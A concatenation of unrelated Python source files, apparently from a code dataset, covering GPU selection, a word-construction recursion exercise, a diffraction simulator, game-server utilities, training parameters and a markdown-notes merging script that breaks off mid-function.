pyunit_utils.standalone_test(test_aggregator_effective_parameters)
else:
test_aggregator_effective_parameters()
|
the-stack_0_19900 | import torch
import subprocess
import numpy as np
import pdb
from graphgym.config import cfg
import logging
import os
def get_gpu_memory_map():
'''Get the current gpu usage.'''
result = subprocess.check_output(
[
'nvidia-smi', '--query-gpu=memory.used',
'--format=csv,nounits,noheader'
], encoding='utf-8')
gpu_memory = np.array([int(x) for x in result.strip().split('\n')])
return gpu_memory
def get_current_gpu_usage():
result = subprocess.check_output(
[
'nvidia-smi', '--query-compute-apps=pid,used_memory',
'--format=csv,nounits,noheader'
], encoding='utf-8')
current_pid = os.getpid()
used_memory = 0
for line in result.strip().split('\n'):
line = line.split(', ')
if current_pid == int(line[0]):
used_memory += int(line[1])
return used_memory
def auto_select_device(memory_max=8000, memory_bias=200, strategy='random'):
'''Auto select GPU device'''
if cfg.device != 'cpu' and torch.cuda.is_available():
if cfg.device == 'auto':
memory_raw = get_gpu_memory_map()
if strategy == 'greedy' or np.all(memory_raw > memory_max):
cuda = np.argmin(memory_raw)
logging.info('GPU Mem: {}'.format(memory_raw))
logging.info(
'Greedy select GPU, select GPU {} with mem: {}'.format(
cuda, memory_raw[cuda]))
elif strategy == 'random':
memory = 1 / (memory_raw + memory_bias)
memory[memory_raw > memory_max] = 0
gpu_prob = memory / memory.sum()
np.random.seed()
cuda = np.random.choice(len(gpu_prob), p=gpu_prob)
np.random.seed(cfg.seed)
logging.info('GPU Mem: {}'.format(memory_raw))
logging.info('GPU Prob: {}'.format(gpu_prob.round(2)))
logging.info(
'Random select GPU, select GPU {} with mem: {}'.format(
cuda, memory_raw[cuda]))
cfg.device = 'cuda:{}'.format(cuda)
else:
cfg.device = 'cpu'
|
the-stack_0_19902 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import (division, absolute_import, print_function,
unicode_literals)
def allConstruct(target: str, wordBank: list, memo: dict = None) -> list:
if memo is None:
memo = {}
if target in memo:
return memo[target]
if target == "":
return [[]]
result = []
for word in wordBank:
try:
if target.index(word) == 0:
suffix = target[len(word):]
suffixWays = allConstruct(suffix, wordBank, memo)
targetWays = list(
map(lambda way, wrd=word: [wrd, *way], suffixWays))
result.extend(targetWays)
except ValueError:
pass
memo[target] = result
return result
def main():
# [['purp', 'le'], ['p', 'ur', 'p', 'le']]
print(allConstruct("purple", ["purp", "p", "ur", "le", "purpl"]))
# [['ab', 'cd', 'ef'], ['ab', 'c', 'def'], ['abc', 'def'], ['abcd', 'ef']]
print(allConstruct("abcdef", ["ab", "abc",
"cd", "def", "abcd", "ef", "c"]))
print(allConstruct("skateboard", [
"bo", "rd", "ate", "t", "ska", "sk", "boar"])) # []
# [['enter', 'a', 'p', 'ot', 'ent', 'p', 'ot'],
# ['enter', 'a', 'p', 'ot', 'ent', 'p', 'o', 't'],
# ['enter', 'a', 'p', 'o', 't', 'ent', 'p', 'ot'],
# ['enter', 'a', 'p', 'o', 't', 'ent', 'p', 'o', 't']]
print(allConstruct("enterapotentpot", [
"a", "p", "ent", "enter", "ot", "o", "t"]))
print(allConstruct("eeeeeeeeeeeeeeeeeeeeeeeeeeez",
["a", "aa", "aaa", "aaaa", "aaaaa"])) # []
if __name__ == '__main__':
main()
|
the-stack_0_19903 | import os
import time
from os import makedirs
import matplotlib.pyplot as plt
import numpy as np
from scipy.interpolate import RectBivariateSpline
from scipy.ndimage.interpolation import affine_transform
from scipy.ndimage.fourier import fourier_gaussian
class Diffractometer:
def __init__(
self,
grid_size=512,
zoom=4,
peak_width=1,
length_scale=3.905,
bot=4e-6,
top=0.7
):
"""
Initialize the diffractometer class
Parameters
----------
grid_size : int,
size of the diffraction grid (default 512)
zoom : (default 1)
peak_width : (default 1)
length_scale : (default 3.905)
bot : (default 4e-6)
top : (default 0.7)
"""
self.N = grid_size
self.zoom = zoom
self.peak_width = peak_width
self.bin_w = 2.0
self.length_scale = length_scale
self.bot = bot
self.top = top
def load(self, xyz, L):
"""Load the particle positions and box dimensions for diffraction.
Note: only supports orthorhombic boxes
Parameters
----------
xyz : np.ndarray (N,3),
positions of each particle
L : iterable object,
lengths of box vectors
"""
self.box = np.array(
[[L[0], 0.0, 0.0],
[0.0, L[1], 0.0],
[0.0, 0.0, L[2]]]
)
self.orig = np.copy(xyz)
self.orig, self.image = shift_pbc(xyz, np.array([L[0], L[1], L[2]]))
def pbc_2d(self, xy, N):
"""
Reasonably fast periodic boundary conditions in two dimensions.
Normalizes xy coordinates to the grid size, N.
Parameters
----------
xy : numpy.ndarray (N,2),
cartesian coordinates from [-0.5, 0.5) to be mapped to [0, N)
N : int,
grid size
Returns
-------
numpy.ndarray (N,2),
particle bins indices in the x and y directions.
"""
xy -= np.rint(xy) - 0.5
xy *= N
xy %= N
return xy.astype(int)
def bin(self, xy, N):
"""
Quickly counts intensities for particles on 2D grid.
Parameters
----------
xy : numpy.ndarray (N,2),
array of bin indices
N : int,
grid size
Returns
-------
im : numpy.ndarray (N,N),
grid of intensities.
"""
t = xy.view(np.dtype((np.void, xy.dtype.itemsize * xy.shape[1])))
_, ids, counts = np.unique(t, return_index=True, return_counts=True)
unique_xy = xy[ids]
N = int(N)
im = np.zeros((N, N))
for x, c in zip(unique_xy, counts):
im[x[1], x[0]] = c
return im
def calc_proj(self, rot):
"""
TODO
Note: orthorhombic boxes only
Parameters
----------
rot : numpy.ndarray (3,3),
rotation matrix
Returns
-------
numpy.ndarray (2,2),
inverse shear matrix
"""
s = np.dot(rot.T, self.box) # rotated box vectors
xy = np.absolute(s[0, 0] * s[1, 1] - s[0, 1] * s[1, 0])
zx = np.absolute(s[0, 2] * s[1, 0] - s[0, 0] * s[1, 2])
yz = np.absolute(s[0, 1] * s[1, 2] - s[0, 2] * s[1, 1])
if (yz >= xy) and (yz >= zx):
shear = np.array(
[[s[0, 1], s[0, 2]],
[s[1, 1], s[1, 2]]]
)
elif (zx >= xy) and (zx >= yz):
shear = np.array(
[[s[0, 2], s[0, 0]],
[s[1, 2], s[1, 0]]]
)
else:
shear = np.array(
[[s[0, 0], s[0, 1]],
[s[1, 0], s[1, 1]]]
)
s_det = np.linalg.det(shear)
if s_det == 0:
print("\nSingular rotation matrix. Bye Bye.")
return
self.Lx = np.linalg.norm(shear[:, 0])
self.Ly = np.linalg.norm(shear[:, 1])
inv_shear = np.linalg.inv(shear)
return inv_shear
def circle_cutout(self, p):
"""
Find pixels indices in diffraction intensity array outside of the circle
Note: taken from Diffractometer.prep_sq()
Parameters
----------
p : numpy.ndarray (N,N),
diffraction intensity array
Returns
-------
numpy.ndarray (N,),
indices of particles outside the circle
note: N != to N in p.shape
"""
y, x = np.indices(p.shape)
rmax = len(x) / 2 - 1
center = np.array([rmax, rmax])
# radii, constant for a single zoom
r = np.hypot(x - center[1], y - center[0]).flatten()
# array index into p corresponding to r
i = np.argsort(r.flat)
# sorted radius indices
r_sort = r.flat[i]
return i[r_sort > rmax]
def scale(self, a):
"""
Scales up a matrix around middle particle
Note: Doesn't handle atoms on periodic boundaries perfectly -- intensity
only on one half of boundary.
Parameters
----------
a : numpy.ndarray (N,N),
input array
Returns
-------
numpy.ndarray (N,N),
scaled array
"""
ny, nx = np.shape(a)
y = np.array([list(range(ny))])
x = np.array([list(range(nx))])
d = RectBivariateSpline(x, y, a, kx=1, ky=1)
x = np.linspace(0, nx, self.N)
y = np.linspace(0, ny, self.N)
d = d(x, y)
return d
def shear_back(self, img, inv_shear):
"""
TODO
Parameters
----------
img : numpy.ndarray (N,N),
array of diffraction intensities
inv_shear : numpy.ndarray (2,2),
inverse shear matrix
Returns
-------
numpy.ndarray (N,N),
sheared array of diffraction intensities
"""
roll = img.shape[0] / 2 - 1
ss = np.max(self.box) * inv_shear
A1 = np.array(
[[1, 0, -roll],
[0, 1, -roll],
[0, 0, 1]]
)
A2 = np.array(
[[ss[1, 0], ss[0, 0], roll],
[ss[1, 1], ss[0, 1], roll],
[0, 0, 1]]
)
A3 = np.linalg.inv(np.dot(A2, A1))
A4 = A3[0:2, 0:2]
A5 = A3[0:2, 2]
img = affine_transform(img, A4, A5, mode="constant")
return img
def diffract_from_camera(self, camera):
"""
2D FFT to get diffraction pattern from intensity matrix.
Parameters
----------
camera : fresnel.camera,
camera which will be used to get the rotation matrix for
diffraction
Returns
-------
numpy.ndarray (N,N),
diffraction pattern
"""
rot = camera_to_rot(camera)
return self.diffract(rot.T)
def diffract(self, rot, cutout=True):
"""
2D FFT to get diffraction pattern from intensity matrix.
Parameters
----------
rot : numpy.ndarray (3, 3),
rotation matrix
cutout : bool,
return diffraction pattern with circle cutout (default True)
Returns
-------
numpy.ndarray (N,N),
diffraction pattern
"""
N = self.N / self.zoom
inv_shear = self.calc_proj(rot)
xy = np.copy(np.dot(self.orig, rot)[:, 0:2])
xy = np.dot(xy, inv_shear.T)
xy = self.pbc_2d(xy, N)
im = self.bin(xy, N)
dp = np.fft.fft2(im)
dp = fourier_gaussian(dp, self.peak_width / self.zoom)
dp = np.fft.fftshift(dp)
dp = np.absolute(dp)
dp *= dp
dp = self.scale(dp)
dp = self.shear_back(dp, inv_shear)
dp /= dp.max()
dp[dp < self.bot] = self.bot
dp[dp > self.top] = self.top
dp = np.log10(dp)
if not cutout:
return dp
idbig = self.circle_cutout(dp)
dp[np.unravel_index(idbig, (self.N, self.N))] = np.log10(self.bot)
return dp
def vector_projection(u, v):
"""
Projection of u onto v
Parameters
----------
u,v : numpy.ndarray (3,),
vectors
Returns
-------
numpy.ndarray (3,),
projection of u onto v
"""
return v * np.dot(u, v)/np.linalg.norm(v)
def unit_vector(vector):
"""
Returns the unit vector of the vector.
"""
return vector / np.linalg.norm(vector)
def get_angle(u, v):
"""
Find angle between u and v
Parameters
----------
u,v : numpy.ndarray (3,),
vectors
Returns
-------
float,
angle between u and v in radians
"""
u = unit_vector(u)
v = unit_vector(v)
angle = np.arccos(np.clip(np.dot(u,v), -1.0, 1.0))
if angle != angle:
# Catches nan values
return 0.0
return angle
def camera_to_rot(camera):
"""
Given a fresnel camera object, compute the rotation matrix
Parameters
----------
camera : fresnel.camera,
camera in fresnel scene
Returns
-------
numpy.ndarray (3,3),
rotation matrix
"""
pos = camera.position
look_at = camera.look_at
cam_vec = np.array(pos)-np.array(look_at)
## axis vectors
#xvec = np.array([1,0,0])
#yvec = np.array([0,1,0])
#zvec = np.array([0,0,1])
## Project the camera vector into the xy, yz, and xz planes
## by subtracting the projection of the plane normal vector
#cam_xy = cam_vec - vector_projection(cam_vec, zvec)
#cam_yz = cam_vec - vector_projection(cam_vec, xvec)
#cam_xz = cam_vec - vector_projection(cam_vec, yvec)
## find the angles betwen the camera vector projections and the axes vectors
## alpha is in the yz, beta xz, gamma xy
#alpha = get_angle(cam_yz, yvec)
#beta = get_angle(cam_xz, zvec)
#gamma = get_angle(cam_xy, xvec)
return rotation_matrix_from_to(cam_vec, np.array([0,0,1]))
def rot_mat(alpha, beta, gamma):
"""
Given angles alpha, beta, and gamma, compute the rotation matrix
Parameters
----------
alpha, beta, gamma : float,
angles about the x, y, and z axes in radians
Returns
-------
numpy.ndarray (3,3),
rotation matrix
"""
Rx = np.array([
[1, 0, 0],
[0, np.cos(alpha), -np.sin(alpha)],
[0, np.sin(alpha), np.cos(alpha)]
])
Ry = np.array([
[np.cos(beta), 0, np.sin(beta)],
[0, 1, 0],
[-np.sin(beta), 0, np.cos(beta)]
])
Rz = np.array([
[np.cos(gamma), -np.sin(gamma), 0],
[np.sin(gamma), np.cos(gamma), 0],
[0, 0, 1]
])
return np.dot(np.dot(Rx,Ry),Rz)
def shift_pbc(positions, box):
"""
Wraps particle positions into a periodic box.
Parameters
----------
positions : numpy.ndarray
particle positions
box : numpy.ndarray
box lengths, assumes box goes from -L/2 to L/2.
Returns
-------
p, numpy.ndarray
wrapped coordinate array
image, numpy.ndarray
image array
"""
p = np.copy(positions)
p += box/2.
image = np.copy(p)
image[:] /= box
image = np.array(image, dtype=int)
p[:] -= image[:]*box
p[p[:, 0] < 0., 0] += box[0]
p[p[:, 1] < 0., 1] += box[1]
p[p[:, 2] < 0., 2] += box[2]
p -= box/2.
return p, image
def rotation_matrix_from_to(a, b):
"""
Returns rotation matrix R such that norm(b)*dot(R,a)/norm(a) = b.
Parameters
----------
a : numpy.ndarray,
A 3-vector
b : numpy.ndarray,
Another 3-vector
Returns
-------
numpy.ndarray
The 3x3 rotation matrix that will would rotate a parallel to b.
"""
a1 = a/np.linalg.norm(a)
b1 = b/np.linalg.norm(b)
theta = np.arccos(np.dot(a1,b1))
if theta<1e-6 or np.isnan(theta):
return np.identity(3)
if np.pi-theta<1e-6: #TODO(Eric): verify correct
d = np.array([1.,0,0])
x = np.cross(a1,d)
else:
x = np.cross(a1,b1)
x /= np.linalg.norm(x)
A = np.array([ [0,-x[2],x[1]], [x[2],0,-x[0]], [-x[1],x[0],0] ])
R = np.identity(3) + np.sin(theta)*A + (1.-np.cos(theta))*np.dot(A,A)
return R
|
the-stack_0_19904 | # coding: utf-8
import dataclasses
import os
from PIL import Image, ImageEnhance
import enum
from os import path
from pathlib import Path
import typing
import shutil
from guilang.description import Description
from guilang.description import Part
from rolling.exception import WrongInputError
from rolling.log import server_logger
from rolling.map.type.zone import ZoneMapTileType
from rolling.model.measure import Unit
from rolling.server.link import CharacterActionLink
if typing.TYPE_CHECKING:
from rolling.kernel import Kernel
from rolling.map.source import ZoneMapSource
from rolling.model.character import CharacterModel
from rolling.model.resource import CarriedResourceDescriptionModel
from rolling.model.stuff import StuffModel
ORIGINAL_AVATAR_PATTERN = "character_avatar__original__{avatar_uuid}.png"
ILLUSTRATION_AVATAR_PATTERN = "character_avatar__illustration__{avatar_uuid}.png"
ZONE_THUMB_AVATAR_PATTERN = "character_avatar__zone_thumb__{avatar_uuid}.png"
@dataclasses.dataclass
class EmptyModel:
pass
def get_on_and_around_coordinates(
x: int, y: int, distance: int = 1, exclude_on: bool = False
) -> typing.List[typing.Tuple[int, int]]:
positions = []
if not exclude_on:
positions.append((x, y))
positions.extend(
[
(x - distance, y - distance),
(x, y - distance),
(x + distance, y - distance),
(x - distance, y),
(x + distance, y),
(x - distance, y + distance),
(x, y + distance),
(x + distance, y + distance),
]
)
return positions
def is_there_resource_id_in_zone(
kernel: "Kernel", resource_id: str, zone_source: "ZoneMapSource"
) -> bool:
for row in zone_source.geography.rows:
for zone_tile_type in row:
zone_tile_type = typing.cast(typing.Type[ZoneMapTileType], zone_tile_type)
try:
productions = kernel.game.world_manager.world.tiles_properties[
zone_tile_type
].produce
except KeyError:
productions = []
if resource_id in [production.resource.id for production in productions]:
return True
return False
def get_stuffs_filled_with_resource_id(
kernel: "Kernel",
character_id: str,
resource_id: str,
exclude_stuff_ids: typing.Optional[typing.List[int]] = None,
) -> typing.Iterator["StuffModel"]:
from rolling.server.lib.stuff import StuffLib
exclude_stuff_ids = exclude_stuff_ids or []
stuff_lib = StuffLib(kernel=kernel)
character_stuffs = stuff_lib.get_carried_by(character_id)
for stuff in character_stuffs:
if (
stuff.filled_with_resource == resource_id
and stuff.id not in exclude_stuff_ids
):
yield stuff
class CornerEnum(enum.Enum):
TOP = "TOP"
TOP_RIGHT = "TOP_RIGHT"
RIGHT = "RIGHT"
BOTTOM_RIGHT = "BOTTOM_RIGHT"
BOTTOM = "BOTTOM"
BOTTOM_LEFT = "BOTTOM_LEFT"
LEFT = "LEFT"
TOP_LEFT = "TOP_LEFT"
def get_opposite_zone_place(
from_: CornerEnum, zone_width: int, zone_height: int
) -> typing.Tuple[int, int]:
width_part_len = zone_width // 3
half_width_part_len = width_part_len // 2
height_part_len = zone_height // 3
half_height_part_len = height_part_len // 2
if from_ == CornerEnum.TOP:
return 0, zone_width // 2
if from_ == CornerEnum.TOP_RIGHT:
return (height_part_len * 2) + half_height_part_len, half_width_part_len + 1
if from_ == CornerEnum.RIGHT:
return zone_height // 2, zone_width - 1
if from_ == CornerEnum.BOTTOM_RIGHT:
return (
(height_part_len * 2) + half_height_part_len,
(width_part_len * 2) + half_width_part_len - 1,
)
if from_ == CornerEnum.BOTTOM:
return zone_height - 1, zone_width // 2
if from_ == CornerEnum.BOTTOM_LEFT:
return half_height_part_len, ((width_part_len * 2) + half_width_part_len - 1)
if from_ == CornerEnum.LEFT:
return zone_height // 2, 0
if from_ == CornerEnum.TOP_LEFT:
return half_height_part_len, half_width_part_len + 1
raise Exception("It is not possible !")
def get_coming_from(
before_row_i: int, before_col_i: int, after_row_i: int, after_col_i: int
) -> CornerEnum:
if after_row_i == before_row_i - 1 and after_col_i == before_col_i:
return CornerEnum.BOTTOM
if after_row_i == before_row_i - 1 and after_col_i == before_col_i + 1:
return CornerEnum.TOP_RIGHT
if after_row_i == before_row_i and after_col_i == before_col_i + 1:
return CornerEnum.LEFT
if after_row_i == before_row_i + 1 and after_col_i == before_col_i + 1:
return CornerEnum.TOP_LEFT
if after_row_i == before_row_i + 1 and after_col_i == before_col_i:
return CornerEnum.TOP
if after_row_i == before_row_i - 1 and after_col_i == before_col_i - 1:
return CornerEnum.BOTTOM_RIGHT
if after_row_i == before_row_i and after_col_i == before_col_i - 1:
return CornerEnum.RIGHT
if after_row_i == before_row_i + 1 and after_col_i == before_col_i - 1:
return CornerEnum.BOTTOM_LEFT
raise Exception("It is not possible !")
def get_corner(
width: int, height: int, new_row_i: int, new_col_i: int
) -> typing.Optional[CornerEnum]:
left_col_i_end = width // 3
right_col_i_start = (width // 3) * 2
top_row_i_end = height // 3
bottom_row_i_start = (height // 3) * 2
more = new_row_i if new_row_i >= 0 else 0
if new_row_i < top_row_i_end:
right_col_i = right_col_i_start + more
left_col_i = left_col_i_end - more
elif new_row_i >= bottom_row_i_start:
more = (height // 3) - (new_row_i - bottom_row_i_start + 1)
more = more if more >= 0 else 0
right_col_i = right_col_i_start + more
left_col_i = left_col_i_end - more
else:
left_col_i = left_col_i_end
right_col_i = right_col_i_start
if new_col_i < left_col_i and new_row_i < top_row_i_end:
return CornerEnum.TOP_LEFT
if new_row_i < 0 and left_col_i <= new_col_i < right_col_i:
return CornerEnum.TOP
if new_col_i >= right_col_i and new_row_i < top_row_i_end:
return CornerEnum.TOP_RIGHT
if new_col_i > (width - 1) and top_row_i_end <= new_row_i < bottom_row_i_start:
return CornerEnum.RIGHT
if new_col_i >= right_col_i and new_row_i >= bottom_row_i_start:
return CornerEnum.BOTTOM_RIGHT
if new_row_i > (height - 1) and left_col_i_end <= new_col_i < right_col_i_start:
return CornerEnum.BOTTOM
if new_col_i < left_col_i and new_row_i >= bottom_row_i_start:
return CornerEnum.BOTTOM_LEFT
if new_col_i < 0 and top_row_i_end <= new_row_i < bottom_row_i_start:
return CornerEnum.LEFT
def filter_action_links(
links: typing.List[CharacterActionLink],
) -> typing.List[CharacterActionLink]:
new_links: typing.List[CharacterActionLink] = []
found_merge_type: typing.List[typing.Any] = []
for link in links:
if link.merge_by is None:
new_links.append(link)
else:
if link.merge_by not in found_merge_type:
new_links.append(link)
found_merge_type.append(link.merge_by)
return new_links
def display_g_or_kg(grams: float) -> str:
if grams < 1000:
return f"{grams} g"
return f"{round(grams/1000, 3)} kg"
def quantity_to_str(quantity: float, unit: Unit, kernel: "Kernel") -> str:
if unit == Unit.GRAM:
return display_g_or_kg(quantity)
unit_str = kernel.translation.get(unit)
quantity = int(quantity) if unit == Unit.UNIT else float(quantity)
return f"{str(quantity)} {unit_str}"
def is_expect_kg(quantity: float, unit: Unit) -> bool:
return unit == Unit.GRAM and quantity >= 1000
def adapt_str_quantity(
quantity: str, unit: Unit, default_unit: Unit, to_str_float: bool = False
) -> str:
if unit == Unit.GRAM:
quantity = quantity.lower()
quantity = quantity.replace(" ", "")
quantity = quantity.replace(",", ".")
if quantity.endswith("kg"):
if not to_str_float:
return f"{float(quantity[:-2]) * 1000}g"
return f"{float(quantity[:-2]) * 1000}"
if quantity.endswith("k"):
if not to_str_float:
return f"{float(quantity[:-1]) * 1000}g"
return f"{float(quantity[:-1]) * 1000}"
if quantity.endswith("g"):
if not to_str_float:
return quantity
return quantity[:-1]
if quantity.endswith("l"):
if not to_str_float:
return quantity
return quantity[:-1]
if default_unit == Unit.KILOGRAM:
if not to_str_float:
return f"{float(quantity) * 1000}g"
return f"{float(quantity) * 1000}"
return quantity
return quantity
def str_quantity_unit(quantity: str) -> typing.Optional[Unit]:
quantity = quantity.lower()
quantity = quantity.replace(" ", "")
if quantity.endswith("kg") or quantity.endswith("k"):
return Unit.KILOGRAM
if quantity.endswith("g"):
return Unit.GRAM
return None
def str_quantity_to_float(quantity: str) -> float:
quantity = quantity.lower()
quantity = quantity.replace(" ", "")
quantity = quantity.replace(",", ".")
if quantity.endswith("kg"):
return float(quantity[:-2]) * 1000
if quantity.endswith("m³"):
return float(quantity[:-2])
if quantity.endswith("g") or quantity.endswith("l") or quantity.endswith("u"):
return float(quantity[:-1])
return float(quantity)
def get_exception_for_not_enough_ap(
character: "CharacterModel", cost: float, can_be_back_url: bool = False
) -> WrongInputError:
return WrongInputError(
f"{character.name} ne possède plus assez de points d'actions "
f"({character.action_points} restant et {cost} nécessaires)"
)
# FIXME BS: replace by iterator on eatable object (to manage all case like invent friends)
def character_can_drink_in_its_zone(
kernel: "Kernel", character: "CharacterModel"
) -> bool:
# TODO: consider path finding
zone_source = kernel.tile_maps_by_position[
(character.world_row_i, character.world_col_i)
].source
return is_there_resource_id_in_zone(
kernel, kernel.game.config.fresh_water_resource_id, zone_source
)
clamp = lambda n, minn, maxn: max(min(maxn, n), minn)
def generate_background_media(media_name: str, folder_path: str) -> None:
illustration_bg_path = Path(path.join(folder_path, "media", "bg", media_name))
if not illustration_bg_path.exists():
Path(folder_path, "media", "bg").mkdir(parents=True, exist_ok=True)
# Make background illustration
server_logger.info(f"Generate background image for {media_name}")
image = Image.open(path.join(folder_path, "media", media_name))
image = image.convert("RGB")
alpha = Image.new("L", image.size, 10)
image.putalpha(alpha)
image.save(illustration_bg_path)
def generate_avatar_illustration_media(
source_image_path: str, save_to_path: str
) -> None:
avatar = Image.open(source_image_path)
ratio = avatar.height / 300
avatar.thumbnail((avatar.width * ratio, 300), Image.ANTIALIAS)
media = Image.new(mode="RGB", size=(768, 300))
media.paste(avatar, ((768 // 2) - (avatar.width // 2), 0))
media.save(save_to_path)
def generate_loading_media(source_image_path: str, save_to_path: str) -> None:
loading = Image.open(source_image_path)
ratio = loading.width / 768
loading.thumbnail((768, loading.height * ratio), Image.ANTIALIAS)
enhancer = ImageEnhance.Brightness(loading)
loading = enhancer.enhance(0.33)
loading.save(save_to_path)
def generate_avatar_zone_thumb_media(source_image_path: str, save_to_path: str) -> None:
avatar = Image.open(source_image_path)
ratio = avatar.height / 64
avatar.thumbnail((avatar.width * ratio, 64), Image.ANTIALIAS)
avatar.save(save_to_path)
def ensure_avatar_medias(kernel: "Kernel", image_source: str, avatar_uuid: str) -> None:
original_avatar_file_name = ORIGINAL_AVATAR_PATTERN.format(avatar_uuid=avatar_uuid)
illustration_avatar_file_name = ILLUSTRATION_AVATAR_PATTERN.format(
avatar_uuid=avatar_uuid
)
zone_thumb_avatar_file_name = ZONE_THUMB_AVATAR_PATTERN.format(
avatar_uuid=avatar_uuid
)
source_target = (
f"{kernel.game.config.folder_path}/media/{original_avatar_file_name}"
)
if not os.path.exists(source_target):
shutil.copy(
image_source,
source_target,
)
illustration_target = (
f"{kernel.game.config.folder_path}/media/{illustration_avatar_file_name}"
)
if not os.path.exists(illustration_target):
generate_avatar_illustration_media(
image_source,
save_to_path=illustration_target,
)
zone_thumb_target = (
f"{kernel.game.config.folder_path}/media/{zone_thumb_avatar_file_name}"
)
if not os.path.exists(zone_thumb_target):
generate_avatar_zone_thumb_media(
image_source,
save_to_path=zone_thumb_target,
)
@dataclasses.dataclass
class ExpectedQuantityContext:
display_unit: Unit
display_unit_name: str
display_unit_short_name: str
real_unit: Unit
default_quantity: str
carried_quantity_str: str
@classmethod
def from_carried_resource(
cls,
kernel: "Kernel",
carried_resource: "CarriedResourceDescriptionModel",
) -> "ExpectedQuantityContext":
expect_kg: bool = is_expect_kg(carried_resource.quantity, carried_resource.unit)
display_unit = Unit.KILOGRAM if expect_kg else carried_resource.unit
unit_name = kernel.translation.get(display_unit)
unit_short_name = kernel.translation.get(display_unit, short=True)
default_quantity = (
f"{carried_resource.quantity / 1000} {unit_short_name}"
if expect_kg
else f"{carried_resource.quantity} {unit_short_name}"
)
carried_quantity_str = quantity_to_str(
carried_resource.quantity, carried_resource.unit, kernel
)
return cls(
display_unit=display_unit,
display_unit_name=unit_name,
display_unit_short_name=unit_short_name,
real_unit=carried_resource.unit,
default_quantity=default_quantity,
carried_quantity_str=carried_quantity_str,
)
@property
def display_kg(self) -> bool:
return self.display_unit == Unit.KILOGRAM
@dataclasses.dataclass
class InputQuantityContext:
user_input: str
user_unit: Unit
real_quantity: float
real_unit: Unit
@classmethod
def from_carried_resource(
cls,
user_input: str,
carried_resource: "CarriedResourceDescriptionModel",
) -> "InputQuantityContext":
expect_kg: bool = is_expect_kg(carried_resource.quantity, carried_resource.unit)
default_unit = Unit.KILOGRAM if expect_kg else carried_resource.unit
user_input = adapt_str_quantity(user_input, carried_resource.unit, default_unit)
real_quantity = str_quantity_to_float(user_input)
user_unit = str_quantity_unit(user_input) or default_unit
return cls(
user_input=user_input,
user_unit=user_unit,
real_quantity=real_quantity,
real_unit=carried_resource.unit,
)
def get_health_percent_sentence(percent: int):
if percent < 10:
return "Extrêmement abîmé"
if percent < 25:
return "Très abîmé"
if percent < 50:
return "Bien abîmé"
if percent < 75:
return "Abîmé"
if percent < 90:
return "Quelque traces d'usures"
return "Bon état"
def square_walker(
x: int, y: int
) -> typing.Generator[typing.Tuple[int, int], None, None]:
yield x, y
d = 1
def top_line():
start_x = 0 - d
fixed_y = 0 - d
return [(start_x, fixed_y)] + [
(start_x + i, fixed_y) for i in range(1, (d * 2) + 1)
]
def right_line():
fixed_x = 0 + d
start_y = 0 - d
return [(fixed_x, start_y + i) for i in range(1, (d * 2) + 1)]
def bottom_line():
start_x = 0 + d
fixed_y = 0 + d
return [(start_x - i, fixed_y) for i in range(1, (d * 2) + 1)]
def left_line():
fixed_x = 0 - d
start_y = 0 + d
return [(fixed_x, start_y - i) for i in range(1, (d * 2))]
while True:
modifiers = top_line() + right_line() + bottom_line() + left_line()
for modifier in modifiers:
yield x + modifier[0], y + modifier[1]
d += 1
|
the-stack_0_19906 | """General training parameters that define the maximum number of
training epochs, the batch size, and learning rate for the ADAM
optimization method. To reproduce the results from the paper,
these values should not be changed. The device can be either
"cpu" or "gpu", which then optimizes the model accordingly after
training or uses the correct version for inference when testing.
"""
PARAMS = {
"n_epochs": 12,
"batch_size": 8,
"learning_rate": 1e-5,
"device": "gpu"
}
"""The predefined input image sizes for each of the 3 datasets.
To reproduce the results from the paper, these values should
not be changed. They must be divisible by 8 due to the model's
downsampling operations. Furthermore, all pretrained models
for download were trained on these image dimensions.
"""
DIMS = {
"image_size_salicon": (240, 320),
"image_size_mit1003": (360, 360),
"image_size_cat2000": (216, 384)
}
|
the-stack_0_19907 | import sys
import os
import textwrap
from datetime import datetime
import json
import pypandoc
def combine_md(f1,f2):
with open(f1,'r') as fp:
k1 = fp.read()
with open(f2,'r') as fp:
k2 = fp.read()
k2 = textwrap.indent(k2,"\t")
sol_banner = "??? Solution\n"
ks = k1+ sol_banner +k2
# print(ks)
with open("tmp.md",'w') as fp:
fp.write(ks)
def append_notes_md(f1,f2,sol_name):
with open(f1,'r') as fp:
k1 = fp.read()
with open(f2,'r') as fp:
k2 = fp.read()
k2 = textwrap.indent(k2,"\t")
# perma_link_name = "\n\n#### "+sol_name+"\n"
now = datetime.now()
date_time = now.strftime("%d %B %Y, %H:%M:%S")
sol_banner = "\n\n??? Notes\n" + "\n\t**Time**: "+date_time+"\n\n"
ks = ""
# ks += perma_link_name
ks += sol_banner +k2
# print(ks)
with open("tmp2.md",'a') as fp:
fp.write(ks)
def gen_combined_notes(basePath,targetPath,sortKey="score"):
with open("meta.json",'r') as fp:
meta = json.load(fp)
# tDir = meta[topic]['name']
if not os.path.exists(basePath):
print("problems dir does not exist")
sys.exit(2)
if not os.path.exists(targetPath):
os.system("mkdir "+targetPath)
topics = os.listdir(basePath)
for t in topics:
with open("topics/"+t.replace('_','-')+".json",'r') as fp:
dic = json.load(fp)
# with open("topics/"+tDir.replace('_','-')+".json",'r') as fp:
# dic = json.load(fp)
tDir = t
for i in range(len(dic['problems'])):
ti = dic['problems'][i]['time_to_solve']
mi,sec = ti.split(":")
tim = int(mi)*60 + int(sec)
dic['problems'][i]['time_sec']=tim
# probs = sorted(dic['problems'],key= lambda i:i['problem_score'])
if sortKey == "score":
probs = sorted(dic['problems'],key= lambda i:i['problem_score'])
elif sortKey == "time":
probs = sorted(dic['problems'],key= lambda i:(i['time_sec'],i['problem_score']))
else:
probs = sorted(dic['problems'],key= lambda i:i['problem_score'])
if not os.path.exists(targetPath):
os.system("mkdir "+targetPath)
targetTopic = meta[tDir]
if not os.path.exists(os.path.join(targetPath,targetTopic)):
os.system("mkdir -p "+targetPath+"/"+targetTopic)
problemsPath = os.path.join(basePath,tDir)
di = os.listdir(problemsPath)
for i in di:
if not os.path.isfile(os.path.join(problemsPath,i)):
dn = problemsPath+"/"+i
targetTopic=meta[tDir]
tdn = targetPath+"/"+targetTopic+"/"+i
ld = os.listdir(dn)
for j in ld:
if not os.path.exists(tdn):
os.system("mkdir "+tdn)
with open(os.path.join(dn,j),'rb') as fp:
data = fp.read()
with open(os.path.join(tdn,j),'wb') as fp2:
fp2.write(data)
combined = ""
for p in probs:
# get problem md
pFile = p['problem_link'].split("/")[-2]
if not os.path.exists(problemsPath+"/"+pFile+".json"):
continue
